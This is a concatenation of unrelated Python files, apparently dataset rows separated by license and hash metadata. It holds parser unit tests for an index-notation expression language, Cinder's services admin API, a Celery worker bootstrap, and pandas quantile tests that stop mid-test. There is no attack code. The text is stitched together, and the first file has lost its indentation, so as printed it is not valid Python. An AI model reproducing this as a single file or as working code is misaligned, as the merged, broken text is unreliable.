for base in '0', '1', '10', '1.', '.1', '.01', '1.2':
for exp in '-1', '0', '1', '10':
self.assert_ast(base+'e'+exp, '', _(float(base+'e'+exp)))
def test_jump_mean(self):
self.assert_ast('[a2_i,i] + {a2_j,j}', '',
('add',
('jump', ('trace', ('grad', v._a2, v._x), _(0), _(1))),
('mean', ('trace', ('grad', v._a2, v._x), _(0), _(1)))))
def test_jump_normal(self): self.assert_ast('[a]_i', 'i', ('mul', ('append_axis', ('jump', v._a), _(2)), ('normal', v._x)))
def test_jump_normal_altgeom(self): self.assert_ast('[a]_altgeom_i', 'i', ('mul', ('append_axis', ('jump', v._a), _(3)), ('normal', v._altgeom)))
def test_laplace_of_group(self):
self.assert_ast('(2 a2_i)_,jj', 'i',
('trace',
('grad',
('grad',
('group',
('mul',
('append_axis', _(2), _(2)),
v._a2)),
v._x),
v._x),
_(1), _(2)))
def test_indices_on_group(self):
self.assert_syntax_error(
"Indices can only be specified for variables, e.g. 'a_ij', not for groups, e.g. '(a+b)_ij'.",
"1 + (a2_i)_j + 1", "ij",
" ^")
def test_unknown_symbol(self):
self.assert_syntax_error(
"Unknown symbol: '#'.",
"1 + # + 1", "",
" ^")
def test_invalid_group_end_partial_expression(self):
self.assert_syntax_error(
"Expected a variable, group or function call.",
"1 + (2 + )", "",
" ^")
def test_invalid_group_end_wrong_bracket_no_whitespace(self):
self.assert_syntax_error(
"Expected ')'.",
"1 + (2 + 3] + 4", "",
" ^")
def test_invalid_group_end_wrong_bracket_whitespace(self):
self.assert_syntax_error(
"Expected ')'.",
"1 + (2 + 3 ] + 4", "",
" ^")
def test_invalid_group_end_eof(self):
self.assert_syntax_error(
"Expected ')'.",
"1 + (2 + 3", "",
" ^")
def test_expected_EOF(self):
self.assert_syntax_error(
"Unexpected symbol at end of expression.",
"1 ) 1", "",
" ^")
def test_shape_mismatch(self):
self.assert_syntax_error(
"Shapes at index 'i' differ: 2, 4.",
"1_j + a234_iji + 1_j", "j",
" ^^^^^^^^")
def test_unknown_variable(self):
self.assert_syntax_error(
"Unknown variable: 'b'.",
"1 + b + 1", "",
" ^")
def test_const_numeric_indices(self):
self.assert_syntax_error(
"Numeric indices are not allowed on constant values.",
"1 + 1_i0 + 1", "",
" ^^^^")
def test_const_repeated_indices(self):
self.assert_syntax_error(
"Indices of a constant value may not be repeated.",
"1 + 1_ii + 1", "",
" ^^^^")
def test_const_index_pos(self):
self.assert_syntax_error(
"Length of axis cannot be determined from the expression.",
"1_i", "i",
" ^")
# NEG
def test_neg_no_whitspace(self): self.assert_ast('-a2_i', 'i', ('neg', v._a2))
def test_neg_whitespace(self): self.assert_ast('- a2_i', 'i', ('neg', v._a2))
def test_neg_in_group(self): self.assert_ast('(- a2_i)', 'i', ('group', ('neg', v._a2)))
# ADD SUB
def test_add_sub_unmatched_indices(self):
self.assert_syntax_error(
"Cannot add arrays with unmatched indices: 'i', 'j'.",
"a22_ij + (a2_i + a2_j + a2_ij)", "ij",
" ^^^^^^^^^^^")
# POW
def test_array_pow_pos(self): self.assert_ast('a2_i^2', 'i', ('pow', v._a2, _(2)))
def test_array_pow_neg(self): self.assert_ast('a2_i^-2', 'i', ('pow', v._a2, ('neg', _(2))))
def test_array_pow_scientific(self): self.assert_ast('a2_i^1e1', 'i', ('pow', v._a2, _(1e1)))
def test_array_pow_scalar_expr(self): self.assert_ast('a2_i^(1 / 3)', 'i', ('pow', v._a2, ('truediv', _(1), _(3))))
def test_scalar_pow_pos(self): self.assert_ast('2^3', '', ('pow', _(2), _(3)))
def test_scalar_pow_neg(self): self.assert_ast('2^-3', '', ('pow', _(2), ('neg', _(3))))
def test_scalar_pow_scalar_expr(self): self.assert_ast('2^(1 / 3)', '', ('pow', _(2), ('truediv', _(1), _(3))))
def test_array_pow_nonconst(self):
self.assert_syntax_error(
"Expected a number.",
"a2_i + a2_i^a + a2_i", "i",
" ^")
def test_array_pow_vector_expr(self):
self.assert_syntax_error(
"An exponent must have dimension 0.",
"1_i + a2_i^(a2_j) + 1_i", "ij",
" ^^^^^^^^^^^")
def test_array_pow_repeated_indices(self):
self.assert_syntax_error(
"Index 'i' occurs more than twice.",
"1_i + a2_i^(a22_ii) + 1_i", "i",
" ^^^^^^^^^^^^^")
# NUMERIC INDEX
def test_numeric_index(self): self.assert_ast('a23_i0', 'i', ('getitem', v._a23, _(1), _(0)))
def test_numeric_index_grad(self): self.assert_ast('a2_i,1', 'i', ('getitem', ('grad', v._a2, v._x), _(1), _(1)))
def test_numeric_index_out_of_range(self):
self.assert_syntax_error(
"Index of dimension 1 with length 4 out of range.",
"1 + a343_i4i + 1", "",
" ^^^^^^^^")
def test_numeric_index_out_of_range_grad(self):
self.assert_syntax_error(
"Index of dimension 0 with length 2 out of range.",
"1 + a2_1,2 + 1", "",
" ^^^^^^")
# EYE
def test_single_eye(self):
for eye in 'δ$':
with self.subTest(eye=eye):
self.assert_ast('a2_i {}_ij'.format(eye), 'j', ('sum', ('mul', ('append_axis', v._a2, _(2)), ('eye', _(2))), _(0)))
def test_multiple_eye(self): self.assert_ast('δ_ij δ_jk a2_i a2_k', '',
('sum',
('mul',
('sum',
('mul',
('sum',
('mul',
('append_axis', ('eye', _(2)), _(2)),
('transpose', ('append_axis', ('eye', _(2)), _(2)), _((2,0,1)))),
_(1)),
('append_axis', v._a2, _(2))),
_(0)),
v._a2),
_(0)))
def test_eye_missing_indices(self):
self.assert_syntax_error(
"Expected 2 indices, got 0.",
"1 + δ + 1", "",
" ^")
def test_eye_invalid_number_of_indices(self):
self.assert_syntax_error(
"Expected 2 indices, got 3.",
"1 + δ_ijk + 1", "",
" ^^^^^")
def test_eye_same_index(self):
self.assert_syntax_error(
"Length of axis cannot be determined from the expression.",
"1 + δ_ii + 1", "",
" ^")
def test_eye_shape_mismatch(self):
self.assert_syntax_error(
"Shapes at index 'k' differ: 2, 3.",
"1 + δ_ij δ_jk a2_i a3_k + 1", "",
" ^^^^^^^^^^^^^^^^^^^")
def test_variable_startswith_eye(self):
b = Array('b', [2,2])
δx = Array('δx', [2,2])
self.assert_ast('b_ij + δx_ij', 'ij', ('add', _(b), _(δx)), variables=dict(b=b, δx=δx))
def test_variable_startswith_dollar_eye(self):
self.assert_syntax_error(
"Expected 2 indices, got 0.",
"a22_ij + $x_ij", "ij",
" ^")
# GRAD
def test_gradient_default(self): self.assert_ast('a2_i,j', 'ij', ('grad', v._a2, v._x))
def test_gradient_other_default(self): self.assert_ast('a2_i,j', 'ij', ('grad', v._a2, v._altgeom), default_geometry_name='altgeom')
def test_gradient_default_trace(self): self.assert_ast('a2_i,i', '', ('trace', ('grad', v._a2, v._x), _(0), _(1)))
def test_gradient_default_double_trace(self): self.assert_ast('a422_ijk,jk', 'i', ('trace', ('grad', ('trace', ('grad', v._a422, v._x), _(1), _(3)), v._x), _(1), _(2)))
def test_gradient_altgeom(self): self.assert_ast('a3_i,altgeom_j', 'ij', ('grad', v._a3, v._altgeom))
def test_gradient_altgeom_trace(self): self.assert_ast('a3_i,altgeom_i', '', ('trace', ('grad', v._a3, v._altgeom), _(0), _(1)))
def test_gradient_altgeom_double_trace(self): self.assert_ast('a433_ijk,altgeom_jk', 'i', ('trace', ('grad', ('trace', ('grad', v._a433, v._altgeom), _(1), _(3)), v._altgeom), _(1), _(2)))
def test_surfgrad_default(self): self.assert_ast('a2_i;j', 'ij', ('surfgrad', v._a2, v._x))
def test_surfgrad_default_trace(self): self.assert_ast('a2_i;i', '', ('trace', ('surfgrad', v._a2, v._x), _(0), _(1)))
def test_gradient_invalid_geom_0dim(self):
self.assert_syntax_error(
"Invalid geometry: expected 1 dimension, but 'a' has 0.",
"1 + a2_i,a_i + 1", "",
" ^^^^^^^^")
def test_gradient_invalid_geom_2dim(self):
self.assert_syntax_error(
"Invalid geometry: expected 1 dimension, but 'a22' has 2.",
"1 + a2_i,a22_i + 1", "",
" ^^^^^^^^^^")
def test_gradient_const_scalar(self):
self.assert_syntax_error(
"Taking a derivative of a constant is not allowed.",
"1_i + 1_,i + 1_i", "i",
" ^^^^")
def test_gradient_const_array(self):
self.assert_syntax_error(
"Taking a derivative of a constant is not allowed.",
"1 + 1_i,i + 1", "",
" ^^^^^")
# NEW GRAD
def test_newgradient(self): self.assert_ast('dx_j:a2_i', 'ij', ('grad', v._a2, v._x))
def test_newgradient_trace(self): self.assert_ast('dx_i:a2_i', '', ('trace', ('grad', v._a2, v._x), _(0), _(1)))
def test_newgradient_double_trace(self): self.assert_ast('dx_k:(dx_j:a422_ijk)', 'i', ('trace', ('grad', ('group', ('trace', ('grad', v._a422, v._x), _(1), _(3))), v._x), _(1), _(2)))
# DERIVATIVE
def test_derivative0(self): self.assert_ast('(2 ?arg + 1)_,?arg', '', ('derivative', ('group', ('add', ('mul', _(2), ('arg', _('arg'))), _(1))), ('arg', _('arg'))))
def test_derivative1(self): self.assert_ast('(a2_i + ?arg_i)_,?arg_j', 'ij', ('derivative', ('group', ('add', v._a2, ('arg', _('arg'), _(2)))), ('arg', _('arg'), _(2))))
def test_derivative2(self): self.assert_ast('(a23_ij + ?arg_ij)_,?arg_kj', 'ik', ('trace', ('derivative', ('group', ('add', v._a23, ('arg', _('arg'), _(2), _(3)))), ('arg', _('arg'), _(2), _(3))), _(1), _(3)))
# NEW DERIVATIVE
def test_newderivative0(self): self.assert_ast('d?arg:(2 ?arg + 1)', '', ('derivative', ('group', ('add', ('mul', _(2), ('arg', _('arg'))), _(1))), ('arg', _('arg'))))
def test_newderivative1(self): self.assert_ast('d?arg_j:(a2_i + ?arg_i)', 'ij', ('derivative', ('group', ('add', v._a2, ('arg', _('arg'), _(2)))), ('arg', _('arg'), _(2))))
def test_newderivative2(self): self.assert_ast('d?arg_kj:(a23_ij + ?arg_ij)', 'ik', ('trace', ('derivative', ('group', ('add', v._a23, ('arg', _('arg'), _(2), _(3)))), ('arg', _('arg'), _(2), _(3))), _(1), _(3)))
# NORMAL
def test_normal(self): self.assert_ast('n:x_i', 'i', ('normal', v._x))
def test_normal_default(self): self.assert_ast('n_i', 'i', ('normal', v._x))
def test_normal_altgeom(self): self.assert_ast('n_altgeom_i', 'i', ('normal', v._altgeom))
def test_normal_default_grad_default(self): self.assert_ast('n_i,j', 'ij', ('grad', ('normal', v._x), v._x))
def test_normal_altgeom_grad_default(self): self.assert_ast('n_altgeom_i,x_j', 'ij', ('grad', ('normal', v._altgeom), v._x))
def test_normal_altgeom_grad_altgeom(self): self.assert_ast('n_altgeom_i,altgeom_j', 'ij', ('grad', ('normal', v._altgeom), v._altgeom))
def test_normal_altgeom_grad_nogeom(self):
self.assert_syntax_error(
"Missing geometry, e.g. ',altgeom_i' or ',x_i'.",
"1 + n_altgeom_i,i + 1", "",
" ^")
def test_normal_missing_indices(self):
self.assert_syntax_error(
"Expected 1 index, got 0.",
"1 + n + 1", "",
" ^")
def test_normal_too_many_indices(self):
self.assert_syntax_error(
"Expected 1 index, got 2.",
"1 + n_ij + 1", "",
" ^^^^")
def test_normal_invalid_geom_0dim(self):
self.assert_syntax_error(
"Invalid geometry: expected 1 dimension, but 'a' has 0.",
"1 + n_a_i + 1", "",
" ^^^^")
def test_normal_invalid_geom_2dim(self):
self.assert_syntax_error(
"Invalid geometry: expected 1 dimension, but 'a22' has 2.",
"1 + n_a22_i + 1", "",
" ^^^^^^")
def test_variable_startswith_normal(self):
nx = Array('nx', [2])
self.assert_ast('nx_i', 'i', _(nx), variables=dict(nx=nx))
# JACOBIAN
def test_jacobian(self): self.assert_ast('J:x', '', ('jacobian', v._x, _(2)))
def test_jacobian_boundary(self): self.assert_ast('J^:x', '', ('jacobian', v._x, _(1)))
def test_jacobian_double_boundary(self): self.assert_ast('J^^:x', '', ('jacobian', v._x, _(0)))
def test_old_jacobian(self): self.assert_ast('d:x', '', ('jacobian', v._x, _(None)))
# VARIABLE LENGTH TESTS
def test_variable_lengths_shape_mismatch1(self):
self.assert_syntax_error(
"Axes have different lengths: 2, 3.",
"aXY_ii + aX2_ii + aY3_ii", "",
"^^^^^^^^^^^^^^^^^^^^^^^^")
def test_variable_lengths_shape_mismatch2(self):
self.assert_syntax_error(
"Shapes at index 'j' differ: 2, 3.",
"aX2X3_iijj", "",
"^^^^^^^^^^")
# FIXED LENGTHS
def test_fixed_lengths(self): self.assert_ast('δ_ij', 'ij', ('eye', _(3)), fixed_lengths=dict(i=3))
def test_fixed_lengths_invalid(self):
self.assert_syntax_error(
'Length of index i is fixed at 3 but the expression has length 2.',
'a2_i', 'i',
' ^',
fixed_lengths=dict(i=3))
def test_fixed_lengths_invalid_linked(self):
self.assert_syntax_error(
'Axes have different lengths: 2, 3.',
'a2_i δ_ij', 'j',
'^^^^^^^^^',
fixed_lengths=dict(j=3))
  # FALLBACK LENGTH
def test_fallback_length(self): self.assert_ast('1_i', 'i', ('append_axis', _(1), _(2)), fallback_length=2)
# ARG
def test_arg0(self): self.assert_ast('a ?coeffs', '', ('mul', v._a, ('arg', _('coeffs'))))
def test_arg1(self): self.assert_ast('a2_i ?coeffs_i', '', ('sum', ('mul', v._a2, ('arg', _('coeffs'), _(2))), _(0)))
def test_arg2(self): self.assert_ast('a23_ij ?coeffs_ij', '', ('sum', ('sum', ('mul', v._a23, ('arg', _('coeffs'), _(2), _(3))), _(1)), _(0)))
def test_arg_reshape(self):
self.assert_syntax_error(
"Argument 'arg' previously defined with 1 axis instead of 2.",
"a2_i (a2_j + ?arg_j) + ?arg_ij", "ij",
" ^^^^^^^")
def test_arg_shape_mismatch(self):
self.assert_syntax_error(
"Axes have different lengths: 2, 3.",
"1 + a2_i ?arg_i + a3_j ?arg_j + 1", "",
"^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")
def test_arg_reshape_external(self):
self.assert_syntax_error(
"Argument 'arg' previously defined with 2 axes instead of 1.",
"1 + a3_j ?arg_j + 1", "",
" ^^^^^^",
{'arg': (2,3)})
def test_arg_shape_mismatch_external(self):
self.assert_syntax_error(
"Shapes at index 'j' differ: 3, 2.",
"1 + a3_j ?arg_j + 1", "",
" ^^^^^^^^^^^",
{'arg': (2,)})
def test_arg_index_pos1(self):
self.assert_syntax_error(
"Length of axis cannot be determined from the expression.",
"?arg_n", "n",
" ^")
def test_arg_index_pos2(self):
self.assert_syntax_error(
"Length of axis cannot be determined from the expression.",
"?foo_,?bar_n", "n",
" ^")
# SUBSTITUTE
def test_arg_subs_0d_const(self): self.assert_ast('?arg_,?arg(arg=1)', '', ('substitute', ('derivative', ('arg', _('arg')), ('arg', _('arg'))), ('arg', _('arg')), _(1)))
def test_arg_subs_0d_var(self): self.assert_ast('?arg_,?arg(arg=a )', '', ('substitute', ('derivative', ('arg', _('arg')), ('arg', _('arg'))), ('arg', _('arg')), v._a))
def test_arg_subs_1d_var(self): self.assert_ast('?arg_i,?arg_j(arg_i = a2_i)', 'ij', ('substitute', ('derivative', ('arg', _('arg'), _(2)), ('arg', _('arg'), _(2))), ('arg', _('arg'), _(2)), v._a2))
def test_arg_subs_2d_var(self): self.assert_ast('?arg_ij,?arg_kl( arg_ij =a23_ji)', 'ijkl', ('substitute', ('derivative', ('arg', _('arg'), _(3), _(2)), ('arg', _('arg'), _(3), _(2))), ('arg', _('arg'), _(3), _(2)), ('transpose', v._a23, _((1,0)))))
def test_arg_multisubs(self): self.assert_ast('(1 + ?x + ?y)(x=1 + a, y=2)', '', ('substitute', ('group', ('add', ('add', _(1), ('arg', _('x'))), ('arg', _('y')))), ('arg', _('x')), ('add', _(1), v._a), ('arg', _('y')), _(2)))
def test_arg_subs_missing_equals(self):
self.assert_syntax_error(
"Expected '='.",
"(1 + ?x)(x + 2)", "",
" ^")
def test_arg_subs_unmatched_indices(self):
self.assert_syntax_error(
"Left and right hand side should have the same indices, got 'kl' and 'jk'.",
"a23_ij + ?x_ij(x_kl=a23_jk) + a23_ij", "ij",
" ^^^^^^^^^^^")
def test_arg_subs_lhs_repeated_index(self):
self.assert_syntax_error(
"Repeated indices are not allowed on the left hand side.",
"a23_ij + ?x_ij(x_kk=a23_jk) + 2", "ij",
" ^^^^")
def test_arg_subs_lhs_numeric_index(self):
self.assert_syntax_error(
"Numeric indices are not allowed on the left hand side.",
"a23_ij + ?x_ij(x_k0=a23_0k) + 2", "ij",
" ^^^^")
def test_arg_subs_lhs_with_questionmark(self):
self.assert_syntax_error(
"The argument name at the left hand side of a substitution must not be prefixed by a '?'.",
"?x_ij(?x_ij=1_ij)", "ij",
" ^^^")
def test_arg_subs_lhs_not_an_argument(self):
self.assert_syntax_error(
"Expected an argument, e.g. 'argname'.",
"?x(1=2)", "",
" ^")
def test_arg_subs_double_occurence(self):
self.assert_syntax_error(
"Argument 'x' occurs more than once.",
"?x(x=1, x=2)", "",
" ^")
def test_arg_subs_zero(self):
self.assert_syntax_error(
"Zero substitutions are not allowed.",
"?x_ij()", "ij",
"^^^^^^^")
# TRANSPOSE
def test_transpose_duplicate_indices(self):
self.assert_syntax_error(
"Cannot transpose from 'ij' to 'jii': duplicate indices.",
"a23_ij", "jii",
"^^^^^^")
def test_transpose_indices_differ(self):
self.assert_syntax_error(
"Cannot transpose from 'ij' to 'jk': indices differ.",
"a23_ij", "jk",
"^^^^^^")
# STACK
def test_stack_1_0d(self): self.assert_ast('<a>_i', 'i', ('append_axis', v._a, _(1)))
def test_stack_1_1di_1(self): self.assert_ast('<a2_i>_i', 'i', v._a2)
def test_stack_2_0d_0d(self): self.assert_ast('<a, a>_i', 'i', ('concatenate', ('append_axis', v._a, _(1)), ('append_axis', v._a, _(1))))
def test_stack_2_1di_0d(self): self.assert_ast('<a2_i, a>_i', 'i', ('concatenate', v._a2, ('append_axis', v._a, _(1))))
def test_stack_3_2di_1d_1d(self): self.assert_ast('<a23_ij, a3_j, 1_j>_i', 'ij', ('concatenate', v._a23, ('transpose', ('append_axis', v._a3, _(1)), _((1,0))), ('transpose', ('append_axis', ('append_axis', _(1), _(3)), _(1)), _((1,0)))))
def test_stack_no_indices(self):
self.assert_syntax_error(
"Expected 1 index.",
"<1, a2_i> + a3_i", "i",
" ^")
def test_stack_too_many_indices(self):
self.assert_syntax_error(
"Expected 1 index, got 2.",
"<1, a2_i>_ij + a3_i", "i",
" ^^")
def test_stack_numeric_index(self):
self.assert_syntax_error(
"Expected a non-numeric index, got '1'.",
"<1, a2_i>_1 + a3_i", "i",
" ^")
def test_stack_0(self):
self.assert_syntax_error(
"Cannot stack 0 arrays.",
"1_i + <>_i + 1_i", "i",
" ^^^^")
def test_stack_unmatched_indices(self):
self.assert_syntax_error(
"Cannot stack arrays with unmatched indices (excluding the stack index 'i'): j, ijk.",
"1_ij + <a2_j, a222_ijk>_i + 1_ij", "ij",
" ^^^^^^^^^^^^^^^^^^")
def test_stack_undetermined_length(self):
self.assert_syntax_error(
"Cannot determine the length of the stack axis, because the length at 12 is unknown.",
"1_i + <a, 1_i>_i + 1_i", "i",
" ^")
def test_stack_whitespace_left(self): self.assert_ast('< a, a>_i', 'i', ('concatenate', ('append_axis', v._a, _(1)), ('append_axis', v._a, _(1))))
def test_stack_whitespace_right(self): self.assert_ast('<a, a >_i', 'i', ('concatenate', ('append_axis', v._a, _(1)), ('append_axis', v._a, _(1))))
def test_stack_whitespace_before_comma(self): self.assert_ast('<a , a>_i', 'i', ('concatenate', ('append_axis', v._a, _(1)), ('append_axis', v._a, _(1))))
# FIXME: the following should work
# 'a2_j a2_i + <0j, δ_ij>_i'
# FUNCTION
def test_function_0d(self): self.assert_ast('func1(a)', '', ('call', _('func1'), v._a))
def test_function_1d(self): self.assert_ast('func1(a2_i)', 'i', ('call', _('func1'), v._a2))
def test_function_2d(self): self.assert_ast('func1(a23_ij)', 'ij', ('call', _('func1'), v._a23))
def test_function_0d_0d(self): self.assert_ast('func2(a, a)', '', ('call', _('func2'), v._a, v._a))
def test_function_1d_1d(self): self.assert_ast('func2(a2_i, a2_i)', 'i', ('call', _('func2'), v._a2, v._a2))
def test_function_2d_2d(self): self.assert_ast('func2(a23_ij, a32_ji)', 'ij', ('call', _('func2'), v._a23, ('transpose', v._a32, _((1,0)))))
def test_function_2d_2d_2d(self): self.assert_ast('func3(a23_ij, a22_ik a23_kj, a23_ij)', 'ij', ('call', _('func3'), v._a23, ('sum', ('mul', ('append_axis', v._a22, _(3)), ('transpose', ('append_axis', v._a23, _(2)), _((2,0,1)))), _(1)), v._a23))
def test_function_invalid_nargs(self):
self.assert_syntax_error(
"Function 'func1' takes 1 argument, got 2.",
"1 + func1(a, a) + 1", "",
" ^^^^^^^^^^^")
def test_function_unmatched_indices(self):
self.assert_syntax_error(
"Cannot align arrays with unmatched indices: ij, ij, jk.",
"1_ij + func3(a23_ij, a23_ij, a23_jk) + 1_ij", "ij",
" ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")
def test_function_unmatched_shape(self):
self.assert_syntax_error(
"Shapes at index 'i' differ: 2, 3.",
"1_ij + func2(a23_ij, a33_ij) + 1_ij", "ij",
" ^^^^^^^^^^^^^^^^^^^^^")
def test_function_unknown(self):
self.assert_syntax_error(
"Unknown variable: 'funcX'.",
"1_ij + funcX(a23_ij) + 1_ij", "ij",
" ^^^^^")
def test_function_override(self):
self.assert_syntax_error(
"Expected '='.",
"1_ij + funcoverride(a23_ij) + 1_ij", "ij",
" ^")
# vim:shiftwidth=2:softtabstop=2:expandtab:foldmethod=indent:foldnestmax=2
| mit | 120,612,330,898,262,830 | 35.829517 | 251 | 0.526392 | false |
github-borat/cinder | cinder/api/contrib/services.py | 1 | 7120 | # Copyright 2012 IBM Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo.config import cfg
import webob.exc
from cinder.api import extensions
from cinder.api.openstack import wsgi
from cinder.api import xmlutil
from cinder import db
from cinder import exception
from cinder.openstack.common.gettextutils import _
from cinder.openstack.common import log as logging
from cinder.openstack.common import timeutils
from cinder import utils
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
authorize = extensions.extension_authorizer('volume', 'services')
class ServicesIndexTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('services')
elem = xmlutil.SubTemplateElement(root, 'service', selector='services')
elem.set('binary')
elem.set('host')
elem.set('zone')
elem.set('status')
elem.set('state')
elem.set('update_at')
elem.set('disabled_reason')
return xmlutil.MasterTemplate(root, 1)
class ServicesUpdateTemplate(xmlutil.TemplateBuilder):
def construct(self):
# TODO(uni): template elements of 'host', 'service' and 'disabled'
# should be deprecated to make ServicesUpdateTemplate consistent
# with ServicesIndexTemplate. Still keeping it here for API
# compatibility sake.
root = xmlutil.TemplateElement('host')
root.set('host')
root.set('service')
root.set('disabled')
root.set('binary')
root.set('status')
root.set('disabled_reason')
return xmlutil.MasterTemplate(root, 1)
class ServiceController(wsgi.Controller):
def __init__(self, ext_mgr=None):
self.ext_mgr = ext_mgr
super(ServiceController, self).__init__()
@wsgi.serializers(xml=ServicesIndexTemplate)
def index(self, req):
"""Return a list of all running services.
Filter by host & service name.
"""
context = req.environ['cinder.context']
authorize(context)
detailed = self.ext_mgr.is_loaded('os-extended-services')
now = timeutils.utcnow()
services = db.service_get_all(context)
host = ''
if 'host' in req.GET:
host = req.GET['host']
service = ''
if 'service' in req.GET:
service = req.GET['service']
LOG.deprecated(_("Query by service parameter is deprecated. "
"Please use binary parameter instead."))
binary = ''
if 'binary' in req.GET:
binary = req.GET['binary']
if host:
services = [s for s in services if s['host'] == host]
# NOTE(uni): deprecating service request key, binary takes precedence
binary_key = binary or service
if binary_key:
services = [s for s in services if s['binary'] == binary_key]
svcs = []
for svc in services:
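            # a service is reported "up" when its last heartbeat is within service_down_time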
delta = now - (svc['updated_at'] or svc['created_at'])
alive = abs(utils.total_seconds(delta)) <= CONF.service_down_time
art = (alive and "up") or "down"
active = 'enabled'
if svc['disabled']:
active = 'disabled'
ret_fields = {'binary': svc['binary'], 'host': svc['host'],
'zone': svc['availability_zone'],
'status': active, 'state': art,
'updated_at': svc['updated_at']}
if detailed:
ret_fields['disabled_reason'] = svc['disabled_reason']
svcs.append(ret_fields)
return {'services': svcs}
def _is_valid_as_reason(self, reason):
if not reason:
return False
try:
utils.check_string_length(reason.strip(), 'Disabled reason',
min_length=1, max_length=255)
except exception.InvalidInput:
return False
return True
@wsgi.serializers(xml=ServicesUpdateTemplate)
def update(self, req, id, body):
"""Enable/Disable scheduling for a service."""
context = req.environ['cinder.context']
authorize(context)
ext_loaded = self.ext_mgr.is_loaded('os-extended-services')
ret_val = {}
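        # the resource id selects the action: enable, disable or disable-log-reason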
if id == "enable":
disabled = False
status = "enabled"
if ext_loaded:
ret_val['disabled_reason'] = None
elif (id == "disable" or
(id == "disable-log-reason" and ext_loaded)):
disabled = True
status = "disabled"
else:
raise webob.exc.HTTPNotFound(explanation=_("Unknown action"))
try:
host = body['host']
except (TypeError, KeyError):
raise webob.exc.HTTPBadRequest()
ret_val['disabled'] = disabled
if id == "disable-log-reason" and ext_loaded:
reason = body.get('disabled_reason')
if not self._is_valid_as_reason(reason):
msg = _('Disabled reason contains invalid characters '
'or is too long')
raise webob.exc.HTTPBadRequest(explanation=msg)
ret_val['disabled_reason'] = reason
# NOTE(uni): deprecating service request key, binary takes precedence
# Still keeping service key here for API compatibility sake.
service = body.get('service', '')
binary = body.get('binary', '')
binary_key = binary or service
if not binary_key:
raise webob.exc.HTTPBadRequest()
try:
svc = db.service_get_by_args(context, host, binary_key)
if not svc:
raise webob.exc.HTTPNotFound(explanation=_('Unknown service'))
db.service_update(context, svc['id'], ret_val)
except exception.ServiceNotFound:
raise webob.exc.HTTPNotFound(explanation=_("service not found"))
ret_val.update({'host': host, 'service': service,
'binary': binary, 'status': status})
return ret_val
class Services(extensions.ExtensionDescriptor):
"""Services support."""
name = "Services"
alias = "os-services"
namespace = "http://docs.openstack.org/volume/ext/services/api/v2"
updated = "2012-10-28T00:00:00-00:00"
def get_resources(self):
resources = []
controller = ServiceController(self.ext_mgr)
resource = extensions.ResourceExtension('os-services', controller)
resources.append(resource)
return resources
| apache-2.0 | 4,511,568,825,888,255,000 | 34.247525 | 79 | 0.597051 | false |
EUDAT-B2STAGE/http-api-base | old_stuff/rapydo/services/celery/worker.py | 1 | 1165 | # -*- coding: utf-8 -*-
"""
Celery pattern. Some interesting read here:
http://blog.miguelgrinberg.com/post/celery-and-the-flask-application-factory-pattern
Of course that discussion is not enough for
a Flask templating framework like ours,
so we made some improvements along the way.
"""
from rapydo.server import create_app
from rapydo.services.celery.celery import celery_app
from rapydo.utils.meta import Meta
from rapydo.utils.logs import get_logger
log = get_logger(__name__)
################################################
# Reload Flask app code also for the worker
# This is necessary to have the app context available
app = create_app(worker_mode=True, debug=True)
# Recover celery app with current app
# celery_app = MyCelery(app)._current
log.debug("Celery %s" % celery_app)
################################################
# Import task modules to make sure all tasks are available
meta = Meta()
main_package = "commons.tasks."
# Base tasks
submodules = meta.import_submodules_from_package(main_package + "base")
# Custom tasks
submodules = meta.import_submodules_from_package(main_package + "custom")
| mit | 2,851,370,823,037,356,000 | 28.125 | 84 | 0.693562 | false |
jreback/pandas | pandas/tests/frame/methods/test_quantile.py | 1 | 18264 | import numpy as np
import pytest
import pandas as pd
from pandas import DataFrame, Series, Timestamp
import pandas._testing as tm
class TestDataFrameQuantile:
@pytest.mark.parametrize(
"df,expected",
[
[
DataFrame(
{
0: Series(pd.arrays.SparseArray([1, 2])),
1: Series(pd.arrays.SparseArray([3, 4])),
}
),
Series([1.5, 3.5], name=0.5),
],
[
DataFrame(Series([0.0, None, 1.0, 2.0], dtype="Sparse[float]")),
Series([1.0], name=0.5),
],
],
)
def test_quantile_sparse(self, df, expected):
# GH#17198
# GH#24600
result = df.quantile()
tm.assert_series_equal(result, expected)
def test_quantile(self, datetime_frame):
from numpy import percentile
df = datetime_frame
q = df.quantile(0.1, axis=0)
assert q["A"] == percentile(df["A"], 10)
tm.assert_index_equal(q.index, df.columns)
q = df.quantile(0.9, axis=1)
assert q["2000-01-17"] == percentile(df.loc["2000-01-17"], 90)
tm.assert_index_equal(q.index, df.index)
# test degenerate case
q = DataFrame({"x": [], "y": []}).quantile(0.1, axis=0)
assert np.isnan(q["x"]) and np.isnan(q["y"])
# non-numeric exclusion
df = DataFrame({"col1": ["A", "A", "B", "B"], "col2": [1, 2, 3, 4]})
rs = df.quantile(0.5)
xp = df.median().rename(0.5)
tm.assert_series_equal(rs, xp)
# axis
df = DataFrame({"A": [1, 2, 3], "B": [2, 3, 4]}, index=[1, 2, 3])
result = df.quantile(0.5, axis=1)
expected = Series([1.5, 2.5, 3.5], index=[1, 2, 3], name=0.5)
tm.assert_series_equal(result, expected)
result = df.quantile([0.5, 0.75], axis=1)
expected = DataFrame(
{1: [1.5, 1.75], 2: [2.5, 2.75], 3: [3.5, 3.75]}, index=[0.5, 0.75]
)
tm.assert_frame_equal(result, expected, check_index_type=True)
# We may want to break API in the future to change this
# so that we exclude non-numeric along the same axis
# See GH #7312
df = DataFrame([[1, 2, 3], ["a", "b", 4]])
result = df.quantile(0.5, axis=1)
expected = Series([3.0, 4.0], index=[0, 1], name=0.5)
tm.assert_series_equal(result, expected)
def test_quantile_date_range(self):
# GH 2460
dti = pd.date_range("2016-01-01", periods=3, tz="US/Pacific")
ser = Series(dti)
df = DataFrame(ser)
result = df.quantile(numeric_only=False)
expected = Series(
["2016-01-02 00:00:00"], name=0.5, dtype="datetime64[ns, US/Pacific]"
)
